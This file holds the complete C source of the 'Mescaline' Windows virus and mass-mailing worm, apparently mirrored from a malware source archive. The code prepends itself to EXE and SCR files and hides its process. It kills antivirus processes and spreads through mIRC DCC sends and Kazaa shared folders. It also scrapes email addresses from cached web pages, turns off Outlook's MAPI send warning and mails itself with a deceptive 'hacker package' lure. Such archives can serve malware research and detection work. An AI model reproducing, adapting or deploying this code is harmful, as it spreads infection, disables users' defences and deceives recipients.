mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 06:55:27 +00:00
658 lines
16 KiB
NASM
658 lines
16 KiB
NASM
|
/*
|
|||
|
Mescaline Virus <EFBFBD> 2003 DR-EF All Right Reserved
|
|||
|
================================================
|
|||
|
When Infected File Is Run The Virus Do This Steps:
|
|||
|
1) Get Virus Path & Command Line
|
|||
|
2) Hide The Virus Process
|
|||
|
3) Disable AntiViruses Monitors
|
|||
|
4) Active The Payload
|
|||
|
5) Go TSR & Infect Any EXE\SCR File After He Closed
|
|||
|
6) Execute The Host
|
|||
|
7) Modify Mirc To Send The Virus To Chatted Users
|
|||
|
8) Infect Every EXE\SCR File In The First Ten Kazaa Shared Dirs
|
|||
|
Every 25 Infections The Virus Use MAPI To Mail Himself To Address That
|
|||
|
He Found In Temporary HTML Files.
|
|||
|
*/
|
|||
|
|
|||
|
#include <stdafx.h>
|
|||
|
#include <stdio.h>
|
|||
|
#include <malloc.h>
|
|||
|
#include <tlhelp32.h>
|
|||
|
#include <shellapi.h>
|
|||
|
#include <mapi.h>
|
|||
|
|
|||
|
const virus_size=49160;
|
|||
|
char viruscopyright[]="[Mescaline] Virus (c) 2oo3 DR-EF";
|
|||
|
char VirusPath[MAX_PATH],VirusParameters[MAX_PATH],VirusTempFile[MAX_PATH];
|
|||
|
tagPROCESSENTRY32 stproc;
|
|||
|
char lst[150][MAX_PATH],addbook[300][MAX_PATH],htmfiles[300][MAX_PATH];
|
|||
|
int Founded=0,Position;
|
|||
|
|
|||
|
/*------------------[File Infection Functions]---------------*/
|
|||
|
|
|||
|
void write_virus(char virus_path[],char WriteTo[],int Virus_Size)
|
|||
|
{
|
|||
|
FILE *File_Handle;
|
|||
|
void *viruscode=malloc(Virus_Size);
|
|||
|
File_Handle=fopen(virus_path,"rb");
|
|||
|
if(File_Handle!=NULL)
|
|||
|
{
|
|||
|
fread(viruscode,Virus_Size,1,File_Handle);
|
|||
|
fclose(File_Handle);
|
|||
|
}
|
|||
|
File_Handle=fopen(WriteTo,"wb");
|
|||
|
if(File_Handle!=NULL)
|
|||
|
{
|
|||
|
fwrite(viruscode,Virus_Size,1,File_Handle);
|
|||
|
fclose(File_Handle);
|
|||
|
}
|
|||
|
free(viruscode);
|
|||
|
}
|
|||
|
void Infect_file(char Virus_path[],char Victim[],char mark[])
|
|||
|
{
|
|||
|
char temp_file[MAX_PATH],check[sizeof(mark)];
|
|||
|
int fsize,mcmp;
|
|||
|
FILE *File_Handle;
|
|||
|
HANDLE hfile,hfileDT;
|
|||
|
DWORD attr;
|
|||
|
FILETIME creation,access,change;
|
|||
|
WIN32_FIND_DATA ffile;
|
|||
|
File_Handle=fopen(Victim,"rb");
|
|||
|
hfile=FindFirstFile(Victim,&ffile);
|
|||
|
fsize=ffile.nFileSizeLow;
|
|||
|
void *data=malloc(ffile.nFileSizeLow);
|
|||
|
fread(data,fsize,1,File_Handle);
|
|||
|
fseek(File_Handle,(fsize-sizeof(mark)),0);
|
|||
|
fread(&check,sizeof(mark),1,File_Handle);
|
|||
|
mcmp=memcmp(check,mark,sizeof(mark));
|
|||
|
fclose(File_Handle);
|
|||
|
if (mcmp!=0)
|
|||
|
{
|
|||
|
attr=GetFileAttributes(Victim);
|
|||
|
SetFileAttributes(Victim,FILE_ATTRIBUTE_NORMAL);
|
|||
|
hfileDT=CreateFile(Victim,GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ | FILE_SHARE_WRITE,0,OPEN_EXISTING,0,0);
|
|||
|
GetFileTime(hfileDT,&creation,&access,&change);
|
|||
|
CloseHandle(hfileDT);
|
|||
|
strcpy(temp_file,Victim);
|
|||
|
strcat(temp_file,"_I");
|
|||
|
write_virus(Virus_path,temp_file,virus_size);
|
|||
|
File_Handle=fopen(temp_file,"ab");
|
|||
|
fwrite(data,ffile.nFileSizeLow,1,File_Handle);
|
|||
|
fwrite(mark,sizeof(mark),1,File_Handle);
|
|||
|
fclose(File_Handle);
|
|||
|
DeleteFile(Victim);
|
|||
|
hfileDT=CreateFile(temp_file,GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ | FILE_SHARE_WRITE,0,OPEN_EXISTING,0,0);
|
|||
|
SetFileTime(hfileDT,&creation,&access,&change);
|
|||
|
CloseHandle(hfileDT);
|
|||
|
CopyFile(temp_file,Victim,true);
|
|||
|
SetFileAttributes(Victim,attr);
|
|||
|
}
|
|||
|
DeleteFile(temp_file);
|
|||
|
free(data);
|
|||
|
FindClose(hfile);
|
|||
|
}
|
|||
|
|
|||
|
int Run_Infected_File(char File[],char Parm[],int Virus_Size)
|
|||
|
{
|
|||
|
FILE *hfile;
|
|||
|
HANDLE h_file;
|
|||
|
WIN32_FIND_DATA ffile;
|
|||
|
int host_size,is_end=0;
|
|||
|
void *data;
|
|||
|
h_file=FindFirstFile(File,&ffile);
|
|||
|
host_size=(ffile.nFileSizeLow-Virus_Size);
|
|||
|
hfile=fopen(File,"rb");
|
|||
|
if(hfile!=NULL)
|
|||
|
{
|
|||
|
data=malloc(host_size);
|
|||
|
fseek(hfile,Virus_Size,SEEK_SET);
|
|||
|
fread(data,host_size,1,hfile);
|
|||
|
fclose(hfile);
|
|||
|
}
|
|||
|
char temp_file[MAX_PATH],cmd[MAX_PATH];
|
|||
|
strcpy(temp_file,File);
|
|||
|
strcat(temp_file,"_v");
|
|||
|
if(GetFileAttributes(temp_file) != -1 && DeleteFile(temp_file) == 0)
|
|||
|
{ // ^-> Check If The File Executed Before.
|
|||
|
strcat(temp_file," ");
|
|||
|
strcat(temp_file,Parm);
|
|||
|
free(data);
|
|||
|
FindClose(h_file);
|
|||
|
WinExec(temp_file,1);
|
|||
|
return(1);
|
|||
|
}
|
|||
|
hfile=fopen(temp_file,"wb");
|
|||
|
if(hfile!=NULL)
|
|||
|
{
|
|||
|
fwrite(data,host_size,1,hfile);
|
|||
|
fclose(hfile);
|
|||
|
}
|
|||
|
free(data);
|
|||
|
FindClose(h_file);
|
|||
|
SetFileAttributes(temp_file,FILE_ATTRIBUTE_HIDDEN);
|
|||
|
strcpy(cmd,temp_file);
|
|||
|
if (strlen(Parm) > 0 )
|
|||
|
{
|
|||
|
strcat(cmd," ");
|
|||
|
strcat(cmd,Parm);
|
|||
|
}
|
|||
|
WinExec(cmd,1);
|
|||
|
SleepEx(500,0);
|
|||
|
do
|
|||
|
{
|
|||
|
is_end=DeleteFile(temp_file);
|
|||
|
}
|
|||
|
while(is_end!=1);
|
|||
|
return(1);
|
|||
|
}
|
|||
|
|
|||
|
/*------------------------[Misc Functions]---------------------*/
|
|||
|
|
|||
|
void PayLoad()
|
|||
|
{
|
|||
|
SYSTEMTIME time;
|
|||
|
GetSystemTime(&time);
|
|||
|
if ((time.wHour==0)==1)
|
|||
|
{
|
|||
|
MessageBox(NULL,"Have You Ever Had The Feeling\nThat You Not Sure If We Wake Or Still Dreaming...\nIt's Call Mescaline\nIt's The Only Way To Fly...",viruscopyright,MB_ICONINFORMATION);
|
|||
|
for(int i=1;i<9999;i++)
|
|||
|
SetWindowText((HWND)(i),viruscopyright);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
void AntiAV()
|
|||
|
{
|
|||
|
HANDLE hsnp,hproc;
|
|||
|
char MayBeAV[MAX_PATH];
|
|||
|
tagPROCESSENTRY32 proc;
|
|||
|
hsnp=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
|
|||
|
proc.dwSize=sizeof(proc);
|
|||
|
Process32First(hsnp,&proc);
|
|||
|
do
|
|||
|
{
|
|||
|
strcpy(MayBeAV,proc.szExeFile);
|
|||
|
strlwr(MayBeAV);
|
|||
|
if(strstr(MayBeAV,"anti") != 0 || strstr(MayBeAV,"avp") != 0 ||
|
|||
|
strstr(MayBeAV,"rav") != 0 || strstr(MayBeAV,"nav") != 0 ||
|
|||
|
strstr(MayBeAV,"troj") != 0 || strstr(MayBeAV,"scan") != 0 ||
|
|||
|
strstr(MayBeAV,"viru") != 0 || strstr(MayBeAV,"safe") != 0)
|
|||
|
{
|
|||
|
hproc=OpenProcess(0,FALSE,proc.th32ProcessID);
|
|||
|
TerminateProcess(hproc,666);
|
|||
|
CloseHandle(hproc);
|
|||
|
}
|
|||
|
}
|
|||
|
while(Process32Next(hsnp,&proc));
|
|||
|
CloseHandle(hsnp);
|
|||
|
}
|
|||
|
|
|||
|
void InitVirus()
|
|||
|
{
|
|||
|
char *cmd,kernel_path[MAX_PATH];
|
|||
|
int pos=0;
|
|||
|
HMODULE krnl;
|
|||
|
FARPROC RSP;
|
|||
|
cmd=GetCommandLine();
|
|||
|
cmd++;
|
|||
|
do
|
|||
|
{
|
|||
|
VirusPath[pos]=(*cmd);
|
|||
|
pos++;
|
|||
|
*cmd++;
|
|||
|
}
|
|||
|
while((*cmd) != '"');
|
|||
|
cmd++;
|
|||
|
if ((*cmd) != 0)
|
|||
|
{
|
|||
|
cmd++;
|
|||
|
pos=0;
|
|||
|
while((*cmd) != NULL)
|
|||
|
{
|
|||
|
VirusParameters[pos]=(*cmd);
|
|||
|
cmd++;
|
|||
|
pos++;
|
|||
|
}
|
|||
|
}
|
|||
|
GetTempPath(MAX_PATH,VirusTempFile);
|
|||
|
strcat(VirusTempFile,"Mescaline.exe");
|
|||
|
GetSystemDirectory(kernel_path,MAX_PATH);
|
|||
|
strcat(kernel_path,"\\Kernel32.dll");
|
|||
|
krnl=LoadLibrary(kernel_path);
|
|||
|
if (krnl != NULL)
|
|||
|
{
|
|||
|
RSP=GetProcAddress(krnl,"RegisterServiceProcess");
|
|||
|
if (RSP != NULL)
|
|||
|
{
|
|||
|
__asm
|
|||
|
{
|
|||
|
push 01h
|
|||
|
push 00h
|
|||
|
call RSP
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
FreeLibrary(krnl);
|
|||
|
AntiAV();
|
|||
|
}
|
|||
|
|
|||
|
void IRC()
|
|||
|
{
|
|||
|
char mirc[MAX_PATH],File[MAX_PATH];
|
|||
|
FILE *hfile;
|
|||
|
strcpy(mirc,"C:\\Program Files\\mIRC\\");
|
|||
|
strcpy(File,mirc);
|
|||
|
strcat(File,"mirc.ini");
|
|||
|
if(GetFileAttributes(File)!=-1)
|
|||
|
{
|
|||
|
WritePrivateProfileString("rfiles","n2","mirc.dll",File);
|
|||
|
strcpy(File,mirc);
|
|||
|
strcat(File,"hi.scr");
|
|||
|
CopyFile(VirusPath,File,false);
|
|||
|
strcpy(File,mirc);
|
|||
|
strcat(File,"mirc.dll");
|
|||
|
hfile=fopen(File,"w");
|
|||
|
if(hfile!=NULL)
|
|||
|
{
|
|||
|
fprintf(hfile,"on 1:join:#: { if ( $nick == $me ) halt\n");
|
|||
|
fprintf(hfile,"else /dcc send $nick %shi.scr }",mirc);
|
|||
|
fclose(hfile);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
BOOL IsInfectable(char filename[])
|
|||
|
{
|
|||
|
char last[3];
|
|||
|
int i;
|
|||
|
for(i=1;i<(int)strlen(filename);i++)
|
|||
|
{
|
|||
|
last[0]=filename[i-2];
|
|||
|
last[1]=filename[i-1];
|
|||
|
last[2]=filename[i];
|
|||
|
}
|
|||
|
strlwr(last);
|
|||
|
if(memcmp(last,"exe",3)==0 || memcmp(last,"scr",3)==0)
|
|||
|
{
|
|||
|
return(TRUE);
|
|||
|
}
|
|||
|
return(FALSE);
|
|||
|
}
|
|||
|
|
|||
|
int Sucker2Sucker()
|
|||
|
{
|
|||
|
HKEY hkey;
|
|||
|
int RetValue,i,num;;
|
|||
|
unsigned char share[MAX_PATH];
|
|||
|
unsigned long Sshare=sizeof(share);
|
|||
|
char search[MAX_PATH],path[MAX_PATH],full[MAX_PATH],text[3];
|
|||
|
HANDLE hfile;
|
|||
|
WIN32_FIND_DATA hfind;
|
|||
|
RetValue=RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Kazaa\\LocalContent",0,KEY_QUERY_VALUE,&hkey);
|
|||
|
if(RetValue != ERROR_SUCCESS)
|
|||
|
return(1);
|
|||
|
strcpy(search,"");
|
|||
|
for(num=48;num!=58;num++)
|
|||
|
{
|
|||
|
text[0]='d';
|
|||
|
text[1]='i';
|
|||
|
text[2]='r';
|
|||
|
text[3]=num;
|
|||
|
for(i=0;i!=4;i++)
|
|||
|
search[i]=text[i];
|
|||
|
for(i=4;i!=MAX_PATH;i++)
|
|||
|
search[i]=NULL;
|
|||
|
RetValue=RegQueryValueEx(hkey,search,0,NULL,share,&Sshare);
|
|||
|
if(RetValue == ERROR_SUCCESS)
|
|||
|
{
|
|||
|
for(i=7;i<MAX_PATH;i++)
|
|||
|
path[i-7]=share[i];
|
|||
|
strcpy(search,path);
|
|||
|
strcat(path,"\\*.*");
|
|||
|
hfile=FindFirstFile(path,&hfind);
|
|||
|
if (hfile != INVALID_HANDLE_VALUE)
|
|||
|
{
|
|||
|
do
|
|||
|
{
|
|||
|
strcpy(full,search);
|
|||
|
strcat(full,"\\");
|
|||
|
strncat(full,hfind.cFileName,sizeof(hfind.cFileName));
|
|||
|
if(IsInfectable(full)==TRUE && strlen(full)>10)
|
|||
|
Infect_file(VirusPath,full,"Ml");
|
|||
|
}
|
|||
|
while(FindNextFile(hfile,&hfind));
|
|||
|
FindClose(hfile);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
RegCloseKey(hkey);
|
|||
|
return(1);
|
|||
|
}
|
|||
|
|
|||
|
/*-----------------------[Mapi Worm]----------------------*/
|
|||
|
|
|||
|
int worming()
|
|||
|
{
|
|||
|
char mapidll[MAX_PATH];
|
|||
|
LPSTR mail_msg="Secret Password,Data,Information Can Be Found Here !!!\nIn This e-mail you can find a lot of secret info\nlike password to web servers and documentation about hacking\nlike 'how to hack web server.txt',or 'How To crack ZIP archive.doc'\n(all documents are in the HackInfo.exe compressed package)\nif you like such stuff you can free register in our web site:\nwww.BestHackersOfTheWorld.com and you will get every week a new\npackage,like the one in the attachment,for free !!!\n\nif you don't want to get mail like this any more please send\n\ta blank e-mail to : BestHackers@dREF.com\n\nand if you want to support us send this mail without any\nchanging to other people that you know.\n\tThank You For Reading This Mail.";
|
|||
|
GetSystemDirectory(mapidll,MAX_PATH);
|
|||
|
strcat(mapidll,"\\mapi32.dll");
|
|||
|
HMODULE MapiModule;
|
|||
|
MapiModule=LoadLibrary(mapidll);
|
|||
|
__asm
|
|||
|
mov eax,01h ; Fix An Expection With The Msoe.dll library
|
|||
|
if(MapiModule==NULL)
|
|||
|
return(1);
|
|||
|
FARPROC SendMail,LogOn,LogOff;
|
|||
|
MapiFileDesc mfile;
|
|||
|
MapiMessage msg;
|
|||
|
MapiRecipDesc rec;
|
|||
|
SendMail=GetProcAddress(MapiModule,"MAPISendMail");
|
|||
|
LogOn=GetProcAddress(MapiModule,"MAPILogon");
|
|||
|
LogOff=GetProcAddress(MapiModule,"MAPILogoff");
|
|||
|
LHANDLE MapiSession;
|
|||
|
if((LogOn == NULL) || (LogOff == NULL) || (SendMail == NULL))
|
|||
|
{
|
|||
|
FreeLibrary(MapiModule);
|
|||
|
return(1);
|
|||
|
}
|
|||
|
int retvalue,i;
|
|||
|
__asm /* MapiLogOn */
|
|||
|
{
|
|||
|
lea eax,MapiSession
|
|||
|
push eax ;lplhSession
|
|||
|
push 00h ;ulReserved
|
|||
|
push 00h ;flFlags
|
|||
|
push 00h ;lpszPassword
|
|||
|
push 00h ;lpszProfileName
|
|||
|
push 00h ;ulUIParam
|
|||
|
call LogOn
|
|||
|
mov retvalue,eax
|
|||
|
}
|
|||
|
if (retvalue != SUCCESS_SUCCESS)
|
|||
|
{
|
|||
|
FreeLibrary(MapiModule);
|
|||
|
return(1);
|
|||
|
}
|
|||
|
for(i=1;i<Founded;i++)
|
|||
|
{
|
|||
|
mfile.lpszPathName=VirusPath;
|
|||
|
mfile.lpszFileName="HackInfo - Package1.exe";
|
|||
|
mfile.nPosition=-1;
|
|||
|
mfile.ulReserved=0;
|
|||
|
rec.ulRecipClass=MAPI_TO;
|
|||
|
rec.lpszName=addbook[i];
|
|||
|
rec.ulReserved=0;
|
|||
|
msg.nFileCount=1;
|
|||
|
msg.lpszNoteText=mail_msg;
|
|||
|
msg.lpszSubject="Best Hackers Teaching You How To Be Hacker !!!";
|
|||
|
msg.ulReserved=0;
|
|||
|
msg.nRecipCount=1;
|
|||
|
msg.lpFiles=&mfile;
|
|||
|
msg.lpRecips=&rec;
|
|||
|
__asm /* MapiSendMail */
|
|||
|
{
|
|||
|
push 00h ;ulReserved
|
|||
|
push 00h ;flFlags
|
|||
|
lea eax,msg
|
|||
|
push eax ;lpMessage
|
|||
|
push 00h ;ulUIParam
|
|||
|
push MapiSession ;lhSession
|
|||
|
call SendMail
|
|||
|
mov retvalue,eax
|
|||
|
}
|
|||
|
if (retvalue != SUCCESS_SUCCESS)
|
|||
|
{
|
|||
|
FreeLibrary(MapiModule);
|
|||
|
return(1);
|
|||
|
}
|
|||
|
}
|
|||
|
__asm /* MAPILogoff */
|
|||
|
{
|
|||
|
push 00h ;ulReserved
|
|||
|
push 00h ;flFlags
|
|||
|
push 00h ;ulUIParam
|
|||
|
push MapiSession;lhSession
|
|||
|
call LogOff
|
|||
|
}
|
|||
|
FreeLibrary(MapiModule);
|
|||
|
return(1);
|
|||
|
}
|
|||
|
|
|||
|
void FindFilesAndMails(char where[])
|
|||
|
{
|
|||
|
char path[MAX_PATH],fullpath[MAX_PATH],buffer[100],mailbuffer[100];
|
|||
|
int i=0;
|
|||
|
BOOL already_have;
|
|||
|
FILE *hfiles;
|
|||
|
size_t size;
|
|||
|
strcpy(path,where);
|
|||
|
strcat(path,"*.*");
|
|||
|
WIN32_FIND_DATA find;
|
|||
|
HANDLE hfile;
|
|||
|
hfile=FindFirstFile(path,&find);
|
|||
|
if (hfile != NULL)
|
|||
|
{
|
|||
|
do
|
|||
|
{
|
|||
|
strcpy(fullpath,where);
|
|||
|
strcat(fullpath,find.cFileName);
|
|||
|
strlwr(find.cFileName);
|
|||
|
if (find.dwFileAttributes==(FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_DIRECTORY))
|
|||
|
{
|
|||
|
if ((strcmp(find.cFileName,".") != 0) || (strcmp(find.cFileName,"..") != 0))
|
|||
|
{
|
|||
|
strcat(fullpath,"\\");
|
|||
|
FindFilesAndMails(fullpath);
|
|||
|
}
|
|||
|
}
|
|||
|
if (strstr(find.cFileName,"ht") != 0)
|
|||
|
{
|
|||
|
hfiles=fopen(fullpath,"rt");
|
|||
|
if (hfiles!=NULL)
|
|||
|
{
|
|||
|
do
|
|||
|
{
|
|||
|
already_have=FALSE;
|
|||
|
strcpy(mailbuffer,"");
|
|||
|
size=fread(&buffer,sizeof(buffer),1,hfiles);
|
|||
|
strlwr(buffer);
|
|||
|
char *temp=strstr(buffer,"mailto:");
|
|||
|
if (temp!=NULL)
|
|||
|
{
|
|||
|
temp=temp+7;
|
|||
|
for(i=0;(i<=MAX_PATH)&&(*temp!='"')&&(*temp!='?')&&(*temp!='<');i++,temp++)
|
|||
|
mailbuffer[i]=*temp;
|
|||
|
mailbuffer[i]=NULL;
|
|||
|
if((strstr(mailbuffer,"@")!=NULL) && strlen(mailbuffer)<30)
|
|||
|
if (Founded < 299)
|
|||
|
{
|
|||
|
for(i=1;i<=Founded;i++)
|
|||
|
if(strcmp(addbook[i],mailbuffer)==0)
|
|||
|
already_have=TRUE;
|
|||
|
if(already_have==FALSE)
|
|||
|
{
|
|||
|
Founded++;
|
|||
|
strcpy(addbook[Founded],mailbuffer);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}while(size);
|
|||
|
fclose(hfiles);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
while(FindNextFile(hfile,&find));
|
|||
|
FindClose(hfile);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
void Active_Worm()
|
|||
|
{
|
|||
|
unsigned char GetValue[MAX_PATH];
|
|||
|
unsigned long GetSize=sizeof(GetValue);
|
|||
|
char fullpath[MAX_PATH],dir[MAX_PATH];
|
|||
|
int i,p=0,x=0;
|
|||
|
GetWindowsDirectory(dir,MAX_PATH);
|
|||
|
strcat(dir,"\\Temporary Internet Files\\");
|
|||
|
FindFilesAndMails(dir);
|
|||
|
HKEY hkey;
|
|||
|
RegOpenKeyEx(HKEY_CURRENT_USER,"Identities",KEY_QUERY_VALUE,0,&hkey);
|
|||
|
strcpy(fullpath,"Identities\\");
|
|||
|
x=RegQueryValueEx(hkey,"Default User ID",0,NULL,GetValue,&GetSize);
|
|||
|
if (x==0)
|
|||
|
{
|
|||
|
for(i=strlen(fullpath);i<MAX_PATH;i++,p++)
|
|||
|
fullpath[i]=GetValue[p];
|
|||
|
strcat(fullpath,"\\Software\\Microsoft\\Outlook Express\\5.0\\Mail");
|
|||
|
x=RegOpenKeyEx(HKEY_CURRENT_USER,fullpath,NULL,KEY_WRITE,&hkey);
|
|||
|
if (x==0)
|
|||
|
RegSetValueEx(hkey,"Warn on Mapi Send",0,REG_DWORD,(LPBYTE)&x,sizeof(x));
|
|||
|
} // ^-> Micro$oft Security ;)
|
|||
|
RegCloseKey(hkey);
|
|||
|
SleepEx(1000,false);
|
|||
|
worming();
|
|||
|
}
|
|||
|
|
|||
|
/*-------------------[Memory Resident Functions]--------------*/
|
|||
|
|
|||
|
BOOL IsProcessExist(char ProcName[])
|
|||
|
{
|
|||
|
int i;
|
|||
|
for(i=0;i<=Position;i++)
|
|||
|
{
|
|||
|
if(strcmp(lst[i],ProcName)==0)
|
|||
|
return (TRUE);
|
|||
|
}
|
|||
|
return(FALSE);
|
|||
|
}
|
|||
|
|
|||
|
void add_proc(char procname[])
|
|||
|
{
|
|||
|
if(IsProcessExist(procname)!=TRUE)
|
|||
|
{
|
|||
|
Position++;
|
|||
|
strcpy(lst[Position],procname);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
void ProcFindAll()
|
|||
|
{
|
|||
|
HANDLE hsnp;
|
|||
|
hsnp=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
|
|||
|
stproc.dwSize=sizeof(stproc);
|
|||
|
Process32First(hsnp,&stproc);
|
|||
|
do
|
|||
|
{
|
|||
|
add_proc(stproc.szExeFile);
|
|||
|
}
|
|||
|
while(Process32Next(hsnp,&stproc));
|
|||
|
CloseHandle(hsnp);
|
|||
|
}
|
|||
|
|
|||
|
void FindNextFileToInfect()
|
|||
|
{
|
|||
|
HANDLE hsnp;
|
|||
|
BOOL found_it=TRUE;
|
|||
|
char my_Target[MAX_PATH];
|
|||
|
strcpy(my_Target,"");
|
|||
|
Start:
|
|||
|
hsnp=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
|
|||
|
stproc.dwSize=sizeof(stproc);
|
|||
|
Process32First(hsnp,&stproc);
|
|||
|
do
|
|||
|
{
|
|||
|
SleepEx(10,0);
|
|||
|
if(IsProcessExist(stproc.szExeFile)==FALSE)
|
|||
|
{
|
|||
|
add_proc(stproc.szExeFile);
|
|||
|
strcpy(my_Target,stproc.szExeFile);
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
while(Process32Next(hsnp,&stproc));
|
|||
|
CloseHandle(hsnp);
|
|||
|
if (strlen(my_Target)==0 && IsProcessExist(my_Target)==TRUE)
|
|||
|
{
|
|||
|
goto Start;
|
|||
|
}
|
|||
|
Start2:
|
|||
|
hsnp=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
|
|||
|
Process32First(hsnp,&stproc);
|
|||
|
do
|
|||
|
{
|
|||
|
SleepEx(10,0);
|
|||
|
if (strcmp(stproc.szExeFile,my_Target) != 0)
|
|||
|
{
|
|||
|
found_it=FALSE;
|
|||
|
}
|
|||
|
else if (strcmp(stproc.szExeFile,my_Target) == 0)
|
|||
|
{
|
|||
|
found_it=TRUE;
|
|||
|
}
|
|||
|
}
|
|||
|
while(Process32Next(hsnp,&stproc));
|
|||
|
CloseHandle(hsnp);
|
|||
|
if (found_it==TRUE || strlen(my_Target)==0)
|
|||
|
{
|
|||
|
goto Start2;
|
|||
|
}
|
|||
|
if (IsInfectable(my_Target)==TRUE)
|
|||
|
{
|
|||
|
// MessageBox(NULL,my_Target,"Debug:Virus Catch File",MB_OK);
|
|||
|
Infect_file(VirusPath,my_Target,"Ml");
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
void TSR_Mode()
|
|||
|
{
|
|||
|
if(strcmp(VirusTempFile,VirusPath)==0)
|
|||
|
{
|
|||
|
ProcFindAll();
|
|||
|
for(int i=1;i<=2;i++)
|
|||
|
{
|
|||
|
AntiAV();
|
|||
|
FindNextFileToInfect();
|
|||
|
}
|
|||
|
if(Position==149)
|
|||
|
ExitProcess(1);
|
|||
|
else if(Position!=149)
|
|||
|
{
|
|||
|
Active_Worm();
|
|||
|
SleepEx(10000,0);
|
|||
|
TSR_Mode();
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
void GoTSR()
|
|||
|
{
|
|||
|
DeleteFile(VirusTempFile);
|
|||
|
if (GetFileAttributes(VirusTempFile)==-1)
|
|||
|
{
|
|||
|
write_virus(VirusPath,VirusTempFile,virus_size);
|
|||
|
SleepEx(500,0);
|
|||
|
ShellExecute(NULL,"open",VirusTempFile,"","",1);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
/*----------------------[Main Function]--------------------*/
|
|||
|
|
|||
|
int APIENTRY WinMain(HINSTANCE hInstance,
|
|||
|
HINSTANCE hPrevInstance,
|
|||
|
LPSTR lpCmdLine,
|
|||
|
int nCmdShow)
|
|||
|
{
|
|||
|
InitVirus();
|
|||
|
PayLoad();
|
|||
|
GoTSR();
|
|||
|
Run_Infected_File(VirusPath,VirusParameters,virus_size);
|
|||
|
IRC();
|
|||
|
Sucker2Sucker();
|
|||
|
if (hPrevInstance)
|
|||
|
ExitProcess(1);
|
|||
|
TSR_Mode();
|
|||
|
return 0;
|
|||
|
}
|